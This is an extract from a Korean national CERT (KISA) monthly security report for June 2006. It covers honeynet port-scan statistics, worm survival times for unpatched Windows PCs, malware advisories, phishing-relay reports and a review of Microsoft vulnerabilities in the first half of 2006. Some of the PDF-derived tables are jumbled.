24 4. 웜 바이러스취약 PC 의생존가능시간 (Survival time) 및감염유형 6월평균생존가능시간은 Windows XP SP1는 25분56초, Windows 2000 SP4는 25분55초로측정되었다. 전월에비하여 Windows XP SP1는 3분23초가증가하였고, Windows 2000 SP4는 4분21초감소하였다. 상반기동안생존가능시간은 4월을제외하면 25분내외로써큰변화를보이지않았다. 월간생존시간변화추이는인터넷에서네트워크취약점을악용하여전파되는웜의활동추이를나타낸다고볼수있으므로, 상반기동안은이러한네트워크취약점악용웜의전파활동에뚜렷한증가또는감소경향이없었던것으로추정된다. 금월에도생존시간분포는전월과같이매우짧은시간대에집중되는경향을보였다. 생존시간의측정은암호설정및보안업데이트를하지않고, 모든포트가열려있는전용선인터넷환경에서 Windows XP SP1 과 Windows 2000 SP4 2 개군으로분류하여 1000 여회를실시하였다. WinXP SP2 는개인방화벽이기본으로설치되므로웜감염피해를상당부분예방할수있음 생존가능시간 : 취약한시스템이인터넷에연결된상태에서웜이나악성코드에감염될때까지의시간 40 분 35 분 30 분 '05 Windows XP SP1 '05 Windows 2000 SP4 '06 Windows XP SP1 '06 Windows 2000 SP4 25 분 20 분 15 분 10 분 5 분 0 분 1 월 2 월 3 월 4 월 5 월 6 월 7 월 8 월 9 월 10 월 11 월 12 월 ( 그림 13) 월별평균생존가능시간변동추이 [ 표 15] 윈도우즈 XP Pro SP1, 윈도우즈 2000 Pro SP4 생존가능시간 Window s XP SP1 구분 Window s 2000 SP4 2006년 최장 298'32" 358'33" 494'50" 661'07" 937'48" 597'44'' 최단 8" 5" 4" 4" 4" 4'' 평균 25'13" 27'40" 23'16" 33'56" 22'33" 25'56'' 최장 296'12" 379'18" 495'14" 894'27" 629'56" 788'46'' 최단 6" 6" 8" 4" 5" 5'' 평균 26'02" 24'17" 27'09" 35'20" 30'16" 25'55''
25 ( 그림 14) Windows XP SP1 생존시간분포분석 ( 그림 15) Windows 2000 SP4 생존시간분포분석
26 1. 허니넷을통한트래픽수집현황 [ 표 16] 허니넷을통한트래픽수집현황 국내소재 IP 국외소재 IP 6월전체 1,945,202 24,545,545 26,490,747 KISA 의허니넷을대상으로포트스캔을한발신지 IP주소기준임 2. 국내로부터의포트스캔현황 KISA 의허니넷에수집된국내소재 IP 주소로부터의포트스캔현황은다음과같다. [ 표 17] 국내 국내포트스캔현황 1월 2월 3월 4월 5월 6월 순위 포트번호 비율 포트번호 비율 포트번호 비율 포트번호 비율 포트번호 비율 포트번호 비율 % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % 기타 기타 5.60% 기타 9.10% 기타 18.42% 기타 36.60% 기타 12.75% 기타 3.60% 합계 100.0% 100.0% 100.0% 100.0% 100.0% 100.0%
27 허니넷에서탐지된국내소재 IP로부터의포트스캔현황은 tcp/135, tcp/22, tcp/1433번포트가차지하는비율이가장높았다. 이번달에는특히 tcp/135번포트에대한스캔시도가많았는데해당포트는윈도우의 RPC 서비스에사용되는포트이나악성 Bot 감염전파를위한취약점스캔에도이용되는경우가많은것으로볼때악성 Bot의감염시도트래픽인것으로보인다. 기타, 31.6% tcp/135, 30.4% tcp/445, 5.9% tcp/1434, 7.1% tcp/1433, 10.0% tcp/22, 15.0% ( 그림 16) 국내 국내 ( 허니넷 ) 포트스캔현황
28 3. 국외로부터의포트스캔현황 국외소재 IP로부터의스캔트래픽은 MS SQL 데이타베이스의취약점을스캔하는 tcp/1434 포트를대상으로한것이가장많아전체의 91.17% 를차지하였다. - 해당포트스캔과관련된트래픽을분석한결과 SQL Slammer 웜의감염시도트래픽에서관찰되는 MS SQL 데이터베이스취약점공격에사용되는패턴이발견되었다. 이는 SQL Slammer 웜에의한것이기보다는해당취약점공격기능을탑재한악성 Bot에의한감염시도트래픽으로추정이되는데, 해당데이터베이스운영자는최신보안패치적용, 이벤트로그분석을통한점검등각별한주의가필요하다고하겠다. [ 표 18] 국외 국내포트스캔현황 1월 2월 3월 4월 5월 6월 순위 포트번호 비율 포트번호 비율 포트번호 비율 포트번호 비율 포트번호 비율 포트번호 비율 % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % 기타 기타 6.22% 기타 5.93% 기타 7.56% 기타 4.84% 기타 1.45% 기타 0.33% 합계 100.0% 100.0% 100.0% 100.0% 100.0% 100.0%
29 tcp1433, 1.7% tcp/22, 3.7% tcp/42, 0.3% tcp/4899, 0.6% 기타, 2.5% tcp/1434, 91.2% ( 그림 17) 국외 국내 ( 허니넷 ) 포트스캔현황 주요포트별서비스및관련악성코드 포트번호프로토콜서비스관련악성코드 22 TCP SSH Remote Login Protocol [trojan] Adore sshd, [trojan] Shaft 80 TCP World Wide Web, HTTP Mydoom, Welchia, Doomjuice, Agobot, Polybot, Bagle, Yaha, Spybot, Back Orifice 2k Plug-Ins, CGI Backdoor, Executor, Hooker, RingZero, Seeker, WAN Remote, Web Server CT, WebDownloader, Zombam 135 TCP/UDP DCE endpoint resolution, MS-RPC Blaster, Agobot, Yaha, Welchia, Polybot, Kibuv, Lovgate, Spybot 139 TCP Netbios-ssn God Message worm, Netlog, Qaz, Deborms, Moega, Yaha 445 TCP netbios-ds Agobot, Deloder, Yaha, Randex, Welchia, Polybot, Sasser, Bobax, Kibuv, Korgo, Spybot, Janx, Netdepix, Zotob, IRCBot, SDBot 1025 TCP/UDP network blackjack Dasher, Remote Storm, ABCHlp, Lala, Keco 1080 TCP/UDP SOCKS Protocol MyDoom, Proxmeg, Bugbear, Hagbard, Daemoni, Lixy 1433 TCP/UDP Microsoft-SQL-Server Spida, SQL Snake 1434 TCP Microsoft-SQL-Server SQL Slammer 2745 TCP urbisnet Bagle 3410 TCP/UDP NetworkLens SSL Event OptixPro, Mockbot 4899 TCP radmin-port RAdmin Port 5000 TCP/UDP commplex-main Back Door Setup, Blazer5, Bubbel, ICKiller, Ra1d, Bobax, Trojan.Webus 6129 TCP/UDP DameWare Mockbot
30 4. 국가별포트스캔현황 KISA 의허니넷을통하여수집된정보를바탕으로해외발신지 IP를분석한결과, 허니넷으로포트스캔을실시한국가별현황은다음과같았다. [ 표 19] 국가별포트스캔현황 1월 2월 3월 4월 5월 6월 순위 국가명 비율 국가명 비율 국가명 비율 국가명 비율 국가명 비율 국가명 비율 1 중국 65.38% 중국 67.61% 중국 64.66% 중국 66.23% 중국 72.90% 중국 77.13% 2 미국 12.74% 미국 10.88% 미국 10.46% 미국 8.76% 미국 7.55% 미국 5.24% 3 대만 4.02% 일본 3.26% 일본 4.74% 일본 4.71% 일본 5.74% 일본 5.09% 4 일본 3.96% 대만 2.53% 대만 3.01% 대만 2.32% 대만 4.18% 인도 4.43% 5 독일 1.51% 벨로루시 1.62% 독일 2.33% 홍콩 2.01% 인도 1.10% 대만 1.32% 6 인도 1.46% 홍콩 1.51% 이란 2.28% 인도 1.79% 러시아 0.95% 프랑스 0.63% 7 홍콩 1.04% 이란 1.40% 인도 1.48% 독일 1.42% 스웨덴 0.72% 영국 0.47% 8 필리핀 0.95% 인도 1.24% 홍콩 1.24% 영국 1.19% 홍콩 0.60% 브라질 0.44% 9 호주 0.91% 유럽연합 1.05% 유럽연합 1.00% 멕시코 1.10% 브라질 0.44% 러시아 0.40% 10 루마니아 0.82% 독일 0.94% 태국 0.91% 호주 0.91% 영국 0.38% 홍콩 0.35% 11 태국 0.71% 호주 0.82% 호주 0.86% 캐나다 0.65% 프랑스 0.38% 스웨덴 0.33% 12 프랑스 0.70% 캐나다 0.68% 칠레 0.73% 뉴질랜드 0.64% 루마니아 0.38% 칠레 0.28% 13 이탈리아 0.64% 루마니아 0.65% 덴마크 0.67% 프랑스 0.61% 유럽연합 0.32% 아르헨티나 0.26% 14 캐나다 0.51% 러시아 0.53% 루마니아 0.49% 폴란드 0.55% 덴마크 0.31% 파키스탄 0.25% 15 칠레 0.46% 태국 0.44% 스페인 0.46% 러시아 0.55% 독일 0.31% 덴마크 0.25% 16 러시아 0.36% 프랑스 0.41% 러시아 0.43% 몽골 0.52% 스페인 0.25% 스페인 0.24% 17 이스라엘 0.36% 네델란드 0.31% 영국 0.37% 태국 0.51% 호주 0.23% 독일 0.22% 18 유럽연합 0.29% 칠레 0.31% 뉴질랜드 0.34% 칠레 0.48% 아르헨티나 0.23% 멕시코 0.18% 19 아르헨티나 0.27% 영국 0.30% 인도네시아 0.30% 네델란드 0.46% 캐나다 0.23% 유럽연합 0.16% 20 영국 0.24% 말레이시아 0.30% 이탈리아 0.28% 사우디아라비아 0.45% 네델란드 0.22% 오스트리아 0.16% 기타 기타 2.68% 기타 3.21% 기타 2.95% 기타 4.15% 기타 2.58% 기타 2.16% 총계 100% 100% 100% 100% 100% 100% 6월 KISA 허니넷으로포트스캔을실시한 IP 소재를국가별로분류한결과중국, 미국, 일본, 인도순으로나타났으며탐지된내용은대부분 tcp/1434, tcp/22번에대한포트스캔으로파악되었다
31 기타, 8.1% 인도, 4.4% 일본, 5.1% 미국, 5.2% 중국, 77.1% ( 그림 18) 국가별포트스캔순위 80.00% 70.00% 67.6% 65.4% 64.7% 66.2% 72.9% 77.1% '06 중국 '06 일본 '06 미국 '05 중국 '05 일본 '05 미국 60.00% 50.00% 40.00% 30.00% 20.00% 10.00% 0.00% 12.7% 10.9% 10.5% 8.8% 7.6% 4.7% 5.1% 4.0% 3.3% 5.2% 5.7% 4.7% 1월 2월 3월 4월 5월 6월 7월 8월 9월 10월 11월 12월 ( 그림 19) 중국, 일본, 미국 3 개국의포트스캔점유율
32 PART Ⅲ 주요보안공지 / 월간특집
33 1. 인터넷침해사고대응지원센터경보현황 06.6 월경보발령없음 2. 인터넷침해사고대응지원센터보안공지사항 보안공지사항에대한보다자세한내용은 KISA 인터넷침해사고대응지원센터홈페이지공지사항 ( 에서확인할수있습니다. MS Excel의신규취약점으로인한피해주의 (6/23) - 보안패치가발표되지않은 MS Excel의취약점을공격할수있는공격코드발견되어사용자의주의를요함 - 원격의악의적사용자가악의적으로작성된 Excel 문서를보내피해자시스템에악성코드를설치하는등, 임의의명령을수행할수있음 - 해당 S/W: Microsoft Excel 2003/2002/2000, Excel Viewer 2003, Microsoft Excel 2004/v. X( 매킨토시용 ) - 예방및대책. 윈도우사용자는출처가불분명한이메일과메신저등으로전송되는파일에대한열어보기자제 특히, 엑셀파일 ( 확장자 xls, xlt, xla, xlm, xlc, xlw, uxdc, csv, iqy, dqy, rqy, oqy, xll, xlb, slk, dif, xlk, xld, xlshtml, xlthtml, xlv 등 ) 이첨부된경우각별히주의하여야함 - 사용하고있는백신프로그램의최신업데이트를유지하고, 실시간감시기능을활성화시킴 참조사이트 : [1] [2] [3] Win32/Bagle.worm 확산에따른감염주의 (6/21) - 암호화된압축파일과암호키값에대한이미지파일첨부를통하여이메일로전파되며, 특정사이트에접속하여추가로악성코드를다운로드받는특징을가지는 Bagle 변종웜에대한주의필요 - 예방및대책. 웜이발송하는유형의메일 ( 참조사이트참고 ) 을수신시첨부파일을열어보지않음
34 . 백신을최신으로업데이트하고주기적으로점검함 참조사이트 보안정보 보안공지 Win32/Bagle.worm 확산에따른감염주의 [MS 보안업데이트 ]2006년 6월 MS 월간보안패치권고 (6/14) - MS IE 누적보안업데이트 (MS06-021) 등 12종에대한보안패치권고 참조사이트 보안정보 보안공지 [MS 보안업데이트 ]2006 년 6 월 MS 월간보안패치권고 Win32.Liage 4 (Win32.Detnat.B) 바이러스감염주의 (6/8) - 최신보안패치가적용되지않은웹브라우져의취약점을이용하여특정게임아이디 / 비밀번호을유출하는 Trojan 을감염시키는 Win32.Liage 4(Win32.Detnat.B) 바이러스의변종이지속출현하여주의가필요 - 예방및대책. 가능하면네트워크폴더공유를해제하며, 꼭필요한경우는반드시추측하기어려운암호설정. 타인이암호없이공유해놓은폴더내의실행파일들을가능한다운로드및실행하지않으며, 꼭필요할경우에는백신점검후사용. 최신윈도우보안패치 ( 웹브라우져포함 ) 적용. 백신 S/W를최신버전으로업데이트하고주기적으로폴더전체점검실시및실시간감시기능활성화 참조사이트 보안정보 보안공지 Win32.Liage 4 (Win32.Detnat.B) 바이러스감염주의
35 주요내용 6월피싱경유지신고통계분석 2006년도상반기마이크로소프트社제품관련보안취약점현황보고서 악성 Bot 감염 PC 사례분석 아파치웹서버에서악성코드유포사례 6 월피싱경유지신고통계분석 본특집은국외의침해사고대응기관, 위장사이트의대상이된기관또는업체, 피싱메일을수신한일반사용자로부터신고를받아처리한피싱경유지통계로서, 국내보안이취약한시스템 ( 웹서버 ) 이국외공격자에의하여피싱경유지사이트로악용된사고통계이다. 국내인터넷금융거래는공인인증서, 보안카드등을사용함으로써실제피싱으로인한위험에대하여국외보다상대적으로안전하며국내발생피싱관련사고의대부분은경유지사이트로악용된사고이다. 월별피싱경유지신고통계 06년 6월 KISA로접수된신규피싱경유지신고건수는총 114건으로, 전월에비하여 12.3% 감소 (130건 114건) 한것으로나타났다. 신고건수의대부분은해외피해기관들로부터직접접수되었으며, 그밖에해외유명웹사이트의정보보호업무를대행하는기업과국외 CERT 팀등으로부터접수되었다. 1 월 2 월 3 월 4 월 5 월 6 월 7 월 8 월 9 월 10 월 11 월 12 월합계 2006 년 년 ,087 건 06년상반기 (1월 ~6월 ) 의월평균건수는 114건으로, 05년상반기 (1월 ~6월 ) 의평균건수 (78건) 대비 36건이증가한것으로나타났다. 전세계적으로도피싱사고가증가추세에있고국내많은시스템들이보안에취약한상태로인터넷에노출되어있어피싱경유지로악용될수있으므로, 중소기업의서버관리자나개인서버운영자, PC이용자등의지속적인관심과주의가필요하다
36 년 2005 년 월 2 월 3 월 4 월 5 월 6 월 7 월 8 월 9 월 10 월 11 월 12 월 월별피싱경유지신고통계 피싱대상기관의유형별분류 접수된신고건수를피싱대상기관유형별로분류한결과, 총 114건의피싱경유지사고가운데은행, 전자지불업체등의금융기관이 72건 (63.2%), 전자상거래관련기업이 40건 (35.0%), 정부기관 2건 (1.8%) 등으로나타났다. 여전히금융기관이가장많은비중을차지하고있으며, 세금납부와관련된미국의정부기관이포함된것이특징적이다. 기관 건수 금융기관 72 전자상거래 40 정부기관 2 전자상거래 35% 정부기관 1.8% 금융 63.2% 기타 - 합계 114 금융전자상거래정부기관
37 피싱대상기관의소재국가별분류 사칭대상이된기관수는총 8개국 20개기관으로집계되어, 지난달대비 7개대상기관이감소하였다. 피싱대상기관및신고건수를국가별로분류한결과, 미국이전체 20개기관중 11개 (55.0%) 기관를차지했고, 신고건수는전체 114건중 97건 (85.1%) 를차지하였다. 여전히미국의기업이국내피싱경유지사고신고건의대부분을차지하고있음을알수있다. 국가기관분류기관수신고건수 금융기관 9 54 미국 전자상거래 1 41 정부기관 1 2 독일 금융기관 2 4 호주 2 4 스위스 1 2 스페인 1 2 영국 1 2 홍콩 1 2 캐나다 총 8 개국 국내피싱경유지사이트기관별분류 피싱경유지로악용된국내시스템을소속기관별로분류한결과, 기업 50건 (43.9%) 이가장많은건수를차지하였다. 그뒤를이어개인이운영하는시스템이나 PC방등이포함되는기타 / 개인유형이 11건 (10%), 사립대학이포함되는교육기관 7건 (6.1%), 종교단체나협의회등비영리기관 7건 (6.1%) 등으로나타났다. 기관 건수 기업 50 교육 7 비영리 7 ISP 서비스이용자 39 기타 / 개인 11 합계 114 ISP 서비스이용자 34% 기타 / 개인 10% 비영리교육 6.1% 6.1% 기업 43.9% 해당홈페이지내에기관정보가없거나 whois 등록정보에서 ISP 관리대역으로만확인되어실제사용기관을확인할수없는경우에해당되는 ISP 서비스이용자 유형은 39건 (34%) 을차지하였다
38 국내피싱경유지사이트이용포트분석 이달에도피싱경유지시스템에서주로이용된포트는 80포트였으며, 전체 114건중 95건 (83.3%) 을차지한것으로나타났다. 웹서비스포트외에다른포트를이용하여경유지사이트를구동한비율은 16.7% 로, 전월 (11.5%) 에비해 5.2%p 증가하였다. HTTP(TCP/80) 포트외에사용된포트는총 8개로 TCP/81, 82, 84, 91, 8000, 8081, 8087, 8949 포트가포함되었다. 사용되는별도의포트들도점차다양해지고있음을알수있다. 포트번호 건수 82 포트 2.6% 8081 포트 3.5% 기타 5.3% 포트 5.3% 기타포트 6 합계 포트 83.3% 80포트 84포트 8081포트 82포트기타 해당포트의알려진기존서비스명 - IANA(Internet Assigned Numbers Authority) 기준 TCP 82 : XFER Utility, TCP 84: Common Trace, TCP91: MIT Dover Spooler TCP 8000 : irdmi, TCP 8081 : Sun Proxy Admin Service, TCP 8087, 8949 : Unassigned 피싱사이트 URL 유형분석 KISA에접수된피싱경유지신고메일의 URL을바탕으로피싱관련파일이삽입된디렉토리위치를확인해본결과, 크게다음과같은유형으로분류할수있었다. 피싱 URL 유형건수유형별사례 사칭기관도메인이포함된디렉토리 23 ~ 생략 게시판디렉토리 16 생략 웹서버의루트디렉토리 3 별도포트오픈 ( 또는별도의 httpd구동 ) 19 유사도메인등록사용 9 중략 ~marrh.us/r1/n/ 기타 생략 합계
39 사칭기관의도메인으로디렉토리를생성하여피싱사이트와관련된파일을삽입한형태가 23건으로가장많았고, 80포트가아닌별도의포트를생성하여웹사이트를구동한경우가 19건으로그뒤를이었다. 그밖에제로보드등의웹게시판관련디렉토리에파일을삽입한건수가 16건, 사칭대상기관의도메인과유사하게도메인을등록해경유지서버에연결하는경우가 9건, 기존에정상적으로운영되던웹서버의루트디렉토리에삽입하는경우가 3건등으로분류되었다. 임의의디렉토리에삽입되어유형분류가어려운경우는모두기타에포함되었다
40 2006 년도상반기마이크로소프트社제품관련보안취약점현황보고서 년상반기 (1 월 ~6 월 ) 보안업데이트현황 마이크로소프트社 ( 이하 MS) 는 2006년도보안업데이트를 MS06-001부터 MS06-032까지 32종발표했으며, 관련된보안취약점은총 57건으로집계되었다. 보안업데이트 34종 (MS05-001~MS05-034), 관련된보안취약점 52건을발표한 2005년상반기와비교할때보안업데이트는약 6% 감소, 보안취약점은약 10% 증가되었다 년상반기 MS 보안취약점의특징을다음과같이몇가지로요약할수있다. 악성코드유포 / 중계웹사이트와피싱메일이악용하는 IE의보안취약점강세 엑셀, 파워포인트, 워드등 MS Office 관련보안취약점비율이높아짐 가 년상반기보안업데이트및보안취약점목록 발표된보안업데이트와관련된내용은 'kbxxxxxx' 문서번호가붙는기술자료로작성되어있으며, 또한보안업데이트에대한취약점정보는 CVE(Common Vulnerabilities and Exposures, 에공표되어있다. MS는발표된각취약점에대한심각도 1) 를 4단계로분류하고다음 [ 표 1] 과같이긴급 (critical), 중요 (important), 보통 (moderate), 낮음 (low) 으로정의한다. [ 표 1] 심각도분류등급정의긴급악용으로인하여사용자개입없이인터넷웜의전파를허용할가능성이있는경우중요악용으로인하여정보를변조할가능성이있는경우보통기본설정이나검사를통하여심각도가크게줄어들거나, 악용이어렵게되는경우낮음악용이지극히어렵거나영향이매우적은경우 (1) 1 월보안업데이트목록 MS 보안업데이트는보통매주둘째주수요일 ( 한국시간 ) 배포되는것이원칙이지만 2005년 12 월말에발표된그래픽스렌더링엔진취약점에대한보안업데이트가 2006년 1월 6일 ( 한국시간 ) 에일정보다앞당겨 MS06-001로배포되었다. 그밖의 1월보안업데이트는 2006년 1월 11일 ( 한국시간 ) 배포되었으며, 다음 [ 표 2] 와같이 1월에발표된보안업데이트 3종, 보안취약점 3건이다. 1) 본고에서는 MS 사이트를참고하는사용자들을위해 2005년 MS에서변경한한국어용어를따르고있음 Security Bulletin : 보안게시판 보안공지 Severity Rating : 위험등급 심각도 Information Disclosure : 정보공개 정보유출
41 [ 표 2] 2006 년 1 월보안업데이트 보안업데이트취약점명취약점정보심각도 MS06-001(KB912919) 그래픽스렌더링엔진취약점 CVE 긴급 MS06-002(KB908519) Windows 포함웹글꼴취약점 CVE 긴급 MS05-003(KB902412) TNEF 디코딩취약점 CVE 긴급 보안취약점계 3 건 (2) 2 월보안업데이트목록 2월보안업데이트는 2006년 2월 15일 ( 한국시간 ) 배포되었으며, 다음 [ 표 3] 과같이보안업데이트 7종, 보안취약점 7건이다. [ 표 3] 2006 년 2 월보안업데이트 보안업데이트취약점명취약점정보심각도 MS06-004(KB910620) WMF 이미지분석메모리손상취약점 CVE 긴급 MS06-005(KB911565) Windows Media Player 취약점 CVE 긴급 MS06-006(KB911564) Windows Media Player 플러그인취약점 CVE 중요 MS06-007(KB913446) IGMP v3 DoS 취약점 CVE 중요 MS06-008(KB911927) 웹클라이언트취약점 CVE 중요 MS06-009(KB901190) 한국어 IME 취약점 CVE 중요 MS06-010(KB889167) PowerPoint 임시인터넷파일정보유출취약점 CVE 보안취약점계 중요 7 건 (3) 3 월보안업데이트목록 3월보안업데이트는 2006년 3월 15일 ( 한국시간 ) 배포되었으며, 다음 [ 표 4] 와같이보안업데이트 2종, 보안취약점 7건이다
42 [ 표 4] 2006년 3월보안업데이트 보안업데이트 취약점명 취약점정보 심각도 필요이상의사용권한을허용하는 Windows MS06-011(KB914798) CVE 서비스 DACL로인한권한상승문제점 중요 Microsoft Office Excel 조작된명명된범위 CVE 원격코드실행취약점 긴급 Microsoft Office Excel 조작된차트개체원 CVE 격코드실행취약점 긴급 Microsoft Office Excel 조작된수식또는열 CVE 긴급설명원격코드실행취약점 MS06-012(KB905413) Microsoft Office Excel 조작된그래픽원격 CVE 긴급코드실행취약점 Microsoft Office Excel 조작된레코드원격 CVE 코드실행취약점 긴급 Microsoft Office 조작된회람쪽지원격코드 CVE 실행취약점 긴급 보안취약점계 7 건 (4) 4 월보안업데이트목록 4월보안업데이트는 2006년 4월 12일 ( 한국시간 ) 배포되었으며, 다음 [ 표 5] 와같이보안업데이트 5종, 보안취약점 14건이다. [ 표 5] 2006 년 4 월보안업데이트 보안업데이트취약점명취약점정보심각도 DHTML 메서드호출메모리손상취약점 CVE 긴급 다중이벤트처리기메모리손상취약점 CVE 긴급 HTA 실행취약점 CVE 긴급 HTML 구문분석취약점 CVE 긴급 COM 개체인스턴스화메모리손상취약점 CVE 긴급 MS06-013(KB912812) HTML 태그메모리손상취약점 CVE 긴급 더블바이트문자구문분석메모리손상취 CVE 약점 긴급 스크립트실행취약점 CVE 긴급 도메인간정보유출취약점 CVE 중요 주소표시줄스푸핑취약점 CVE 보통 MS06-014(KB911562) Microsoft Windows MDAC 취약점 CVE 긴급 MS06-015(KB908531) Windows 셸취약점 CVE 긴급 Microsoft Outlook Express Windows 주소록 MS06-016(KB911567) CVE 파일사용취약점 중요 사이트간스크립팅 Front Page Server MS06-017(KB917627) CVE Extensions 취약점 보통 보안취약점계 14 건
43 (5) 5 월보안업데이트목록 5월보안업데이트는 2006년 5월 10일 ( 한국시간 ) 배포되었으며, 다음 [ 표 6] 와같이보안업데이트 3종, 보안취약점 5건이다. [ 표 6] 2006년 5월보안업데이트 보안업데이트 취약점명 취약점정보 심각도 MSDTC 잘못된메모리액세스취약점 CVE 보통 MS06-018(KB913580) MSDTC 서비스거부취약점 CVE 보통 MS06-019(KB916803) Exchange 일정취약점 CVE 긴급 Flash Player 취약점 CVE 긴급 MS06-020(KB913433) Flash Player 취약점 CVE 긴급 보안취약점계 5 건 (6) 6 월보안업데이트목록 6월보안업데이트는 2006년 6월 14일 ( 한국시간 ) 배포되었으며, 다음 [ 표 7] 과같이보안업데이트 12종, 보안취약점 21건이다
44 [ 표 7] 2006 년 6 월보안업데이트 보안업데이트취약점명취약점정보심각도 예외처리메모리손상취약점 CVE 긴급 HTML 디코딩메모리손상취약점 CVE 긴급 ActiveX 컨트롤메모리손상취약점 CVE 긴급 COM 개체인스턴스화메모리손상취약점 MS06-021(KB916281) CVE 긴급 CSS 도메인간정보유출취약점 CVE 중요 주소표시줄스푸핑취약점 CVE 중요 MHT 메모리손상취약점 CVE 보통 주소표시줄스푸핑취약점 CVE 보통 MS06-022(KB918439) ART 이미지렌더링취약점 CVE 긴급 MS06-023(KB917344) Microsoft JScript 메모리손상취약점 CVE 긴급 MS06-024(KB917734) Windows Media Player PNG 취약점 CVE 긴급 MS06-025(KB911280) RRAS 메모리손상취약점 CVE 긴급 RASMAN 레지스트리손상취약점 CVE 긴급 MS06-026(KB918547) 그래픽렌더링취약점 CVE 긴급 MS06-027(KB917336) Microsoft Word 조작된개체포인터취약점 CVE 긴급 조작된레코드를사용하는 Microsoft MS06-028(KB916768) CVE PowerPoint 원격코드실행취약점 긴급 Outlook Web Access를실행하는 Microsoft MS06-029(KB912442) CVE Exchange Server 취약점 중요 MS06-030(KB914389) SMB 드라이버권한상승취약점 CVE 중요 SMB 잘못된핸들취약점 CVE 보통 MS06-031(KB917736) RPC 상호인증취약점 CVE 보통 MS06-032(KB917953) IP 원본라우팅취약점 CVE 중요 보안취약점계 21 건 나 년상반기보안취약점현황분석 (1) 보안취약점심각도분석 보안취약점은 [ 표 1] 과같이 4가지의심각도로나누어지며, 2006년도상반기심각도별취약점추이를 ( 그림 1)~( 그림 4) 과같이정리하였다
45 ( 그림 1) 2006 년심각도별취약점통계 ( 긴급 ) ( 그림 2) 2006 년심각도별취약점통계 ( 중요 )
46 ( 그림 3) 2006 년심각도별취약점통계 ( 보통 ) ( 그림 4) 2006 년심각도별취약점통계 ( 낮음 ) 특히 긴급 의경우 36건으로 2005년상반기와비교할때약 64% 증가되었다. 긴급 36건의취약점은사용자개입없이인터넷웜의전파를허용할가능성이있는경우를의미하므로취약점악용으로인한피해를최소화하기위해서는사용자들의보안패치를강조해야한다
47 MS 그래픽스렌더링엔진취약점및 MS DHTML 메서드호출메모리손상취약점은보안업데이트가발표되기이전에악성코드유포사이트를구성한취약점으로사용되었다. 2006년상반기에는 낮음 에해당하는보안업데이트는발표되지않았다. (2) 영향을받는소프트웨어분포 2006년상반기보안업데이트대상소프트웨어중 Office 제품군과 IE 제품군의비율이각각 10.31%, 19.59% 로나타났다. 2005년도에 Office 제품군과 IE 제품군을대상으로한보안업데이트가각각 1.98%, 8.91% 였던것에비하면증가양상이특히두드러지게나타났다. 또한네트워크를통해공격이가능한보안취약점을악용하여주로서버시스템을공격하는웜이과거에발견되었다면, 2006년에발견된보안취약점은악의적웹사이트로의접속을유도하거나악성첨부파일을열어보는것을통해악성코드감염을유도하는형태의취약점의비중이높아졌다. 이는클라이언트수준의보안업데이트관리에대해서도중요성이높아졌다는것을의미한다. Office 제품군의경우 MS Word, Excel, PowerPoint 등각제품에대한보안취약점이꾸준히발표되고있다. 또한 Office 제품군의경우보안업데이트발표이전에해당취약점을악용한악성코드가먼저인터넷에발표된바있어앞으로주의가요구된다. ( 그림 5) 영향을받는소프트웨어 (3) 취약점으로인한영향 2006년상반기에발표된취약점들의영향을살펴보면, ( 그림 6) 과같이악용이성공했을경우원격코드실행이가능한취약점이 80% 로대부분을차지하고있다. 또한네트워크서비스거부나시스템정지등서비스거부는 5%, 로컬에서일반권한을가진사용자가관리자권한을획득할수
48 있는권한상승이 5% 였다. 그러므로 2006년상반기의 MS사보안취약점으로인한영향은주로원격코드실행을유발할수있는형태이다. ( 그림 6) 취약점으로인한영향 (4) 취약점 un-patch 기간 ( 그림 7) 취약점생명주기모델 취약점발견 (Discovery) 취약점정보공개 (Disclosure) 취약점패치배포 (Patch Released) 와같은일정한사이클이존재한다 [2]. 즉 ( 그림 7) 과같이일반적으로취약점이발견되고나서확산되어공개될때까지공격은서서히증가하며, 패치배포이후완만하게사고가감소해나간다. 취약점이개선되었다고해도침해사고는매우긴시간을통해나타날수도있다. 침해사고가급증하는 un-patch 기간은취약점정보공개부터취약점패치배포까지이다. ( 그림 8) 은 2006년도상반기보안취약점 57건에대해서평균 un-patch 기간을심각도별로산출한것이다. 여기서취약점정보공개일은 CVE에취약점정보가등록된일자이고, 취약점패치배포는 MS사의월정기보안업데이트일자이다. 2005년평균 97일간취약점관련정보가노출되어있었으나 2006년에는평균 84일로 un-patch 평균기간이 2005년과비교하여열흘이상줄었다. MS 그래픽렌더링엔진의취약점의 un-patch 기간이 9일로서가장짧았는데, 이것은해
49 당취약점이공개된시기가월말 ( ) 이었고악의적인웹사이트에서악성코드유포에사용할수있는 IE 취약점이었으며, 해당취약점을악용한공격이인터넷에계속하여발표됨에따라정기보안업데이트일정보다며칠앞당겨대역외 (Out-of-band, OOB) 보안업데이트형태로발표되었기때문이다. 2006년상반기에는 낮음 에해당하는등급의보안업데이트가발표되지않았다. ( 그림 8) 심각도별 un-patch 평균일 (5) 취약점을악용하는악성코드현황 시만텍의악성코드등록데이터베이스를기준으로 2006년상반기발표된 MS사의보안취약점을감염수단으로악용하는악성코드목록은 [ 표 8] 과같이정리된다. 특히 MS06-001, MS06-013은악의적인웹사이트에서사용자의 PC에악성코드를설치하기위한취약점으로악용되었다. 보안업데이트 MS MS MS MS [ 표 8] 2006 년상반기 MS 사보안취약점과이를악용하는악성코드 보안업데이트명 그래픽렌더링엔진의취약점으로인한원격코드실행문제점 Microsoft Office의취약점으로인한원격코드실행문제점 Internet Explorer 누적보안업데이트 Microsoft Word 의취약점으로인한원격코드실행문제점 PWSteal.Metafisher Trojan.Nithsys JS.Dloader.BXR Trojan.Stranget.B Trojan.Textcash Backdoor.Ripgof.B 해당취약점을악용하는악성코드
